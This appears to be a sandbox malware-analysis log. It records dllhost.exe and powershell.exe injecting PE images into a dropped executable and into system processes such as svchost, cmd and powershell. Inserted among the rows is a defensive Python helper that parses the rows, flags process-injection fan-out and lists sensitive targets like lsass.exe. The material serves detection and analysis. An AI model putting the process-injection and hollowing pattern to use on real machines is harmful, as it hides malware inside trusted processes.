Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 880000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 8C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: CC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: EE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 560000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 11E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 820000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1240000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1030000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1320000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: B00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: F90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: F80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 880000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 14B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 8C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1140000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 560000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 560000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 14B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23BF59D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1140000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 253FC3D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2A5AF330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 215B73E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21426A50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1B4A4670000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1780D3E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23BF59D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 253FC3D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 2A5AF330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 215B73E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21426A50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1B4A46A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1780D3E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 21D595A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1AD30AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 21D59C90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1EA080B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2085AEE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 1AD30AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2085CF50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 29E3BCD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 29E3BF00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 1956F090000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 2A3ED7F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 211CD8E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 211CF9E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: PID: 4004 base: 86A0000 value: 4D
Source: C:\Windows\System32\dllhost.exe Memory written: PID: 4004 base: 86A0000 value: 4D
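The rows above are what PE injection looks like in sandbox telemetry: dllhost.exe writes buffers that begin with 4D5A (the "MZ" DOS-header magic of a PE image) into the dropped OfyVZAuwZWiDFtIMq.exe and into system processes such as svchost.exe, cmd.exe, conhost.exe, WMIADAP.exe and powershell.exe, at a fresh base address each time. The Python below is an added triage helper, not part of the sandbox report or of the sample: it parses rows in exactly this shape, labels each write as a full PE image (MZ prefix), a one-byte partial capture (the "value: 4D" rows), or opaque (no bytes shown), and aggregates per-source fan-out. The sample rows are constructed from the lines above; the HIGH_VALUE_TARGETS set and the fan-out threshold are our own triage choices, not something the report defines.

```python
import re
from collections import Counter

# Constructed sample: six rows in the exact shape of the "Memory written"
# lines in the report (paths and base addresses are copied from it; which
# rows to include is our choice for the demo).
SAMPLE_ROWS = r"""
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1320000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23BF59D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\cmd.exe base: 253FC3D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: PID: 4004 base: 86A0000 value: 4D
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000
""".strip().splitlines()

# One regex for all three row variants: path target, PID-only target, and
# an optional "value:" / "value starts with:" hex prefix at the end.
ROW_RE = re.compile(
    r"^Source: (?P<src>.+?) Memory written: "
    r"(?:(?P<dst>[A-Za-z]:\\.+?\.exe)|PID: (?P<pid>\d+)) "
    r"base: (?P<base>[0-9A-Fa-f]+)"
    r"(?: value(?: starts with)?: (?P<value>[0-9A-Fa-f]+))?$"
)

MZ_MAGIC = "4D5A"  # "MZ": the DOS header that opens every PE image

# Processes where a foreign write from a dropper is never benign. This set
# is our triage choice (assumption), not part of the report.
HIGH_VALUE_TARGETS = {"lsass.exe", "winlogon.exe", "explorer.exe", "smartscreen.exe"}


def parse_row(line):
    """Turn one report row into a dict, or None if the row has another shape."""
    m = ROW_RE.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    return {
        "source": d["src"],
        "target": d["dst"] or f"PID:{d['pid']}",
        "base": int(d["base"], 16),
        "value": (d["value"] or "").upper(),
    }


def classify(row):
    """'pe_image' when the written bytes start with MZ, 'partial' when the
    sandbox only captured a prefix of MZ (e.g. '4D'), else 'opaque'."""
    v = row["value"]
    if v.startswith(MZ_MAGIC):
        return "pe_image"
    if v and MZ_MAGIC.startswith(v):
        return "partial"
    return "opaque"


def target_basename(target):
    return target.rsplit("\\", 1)[-1].lower()


def summarize(lines):
    """Per source process: total writes, distinct targets, targets that
    received a full PE image, and high-value targets touched."""
    stats = {}
    for line in lines:
        row = parse_row(line)
        if row is None:
            continue
        s = stats.setdefault(row["source"], {
            "writes": 0, "targets": Counter(), "pe_targets": set(), "high_value": set()})
        s["writes"] += 1
        s["targets"][row["target"]] += 1
        if classify(row) == "pe_image":
            s["pe_targets"].add(row["target"])
        if target_basename(row["target"]) in HIGH_VALUE_TARGETS:
            s["high_value"].add(row["target"])
    return stats


def fan_out_sources(stats, min_targets=3):
    """Sources writing into at least min_targets distinct processes: the
    spray-into-everything pattern dllhost.exe shows in this report."""
    return sorted(src for src, s in stats.items() if len(s["targets"]) >= min_targets)


if __name__ == "__main__":
    stats = summarize(SAMPLE_ROWS)
    for src, s in stats.items():
        print(f"{src}: {s['writes']} writes into {len(s['targets'])} processes, "
              f"{len(s['pe_targets'])} received a PE image, "
              f"high-value targets: {sorted(s['high_value'])}")
    print("fan-out sources:", fan_out_sources(stats))
```

Run against the full report, the same summary separates the two injection stages visible here: powershell.exe writing into the freshly started dllhost.exe at its 140000000 image base (process hollowing of the host), then dllhost.exe spraying PE images into every other process it can open. Treat the "partial" label as inconclusive rather than benign; the sandbox simply showed fewer bytes.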
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 356
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 2432
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 6400
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: 356 1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 3000000
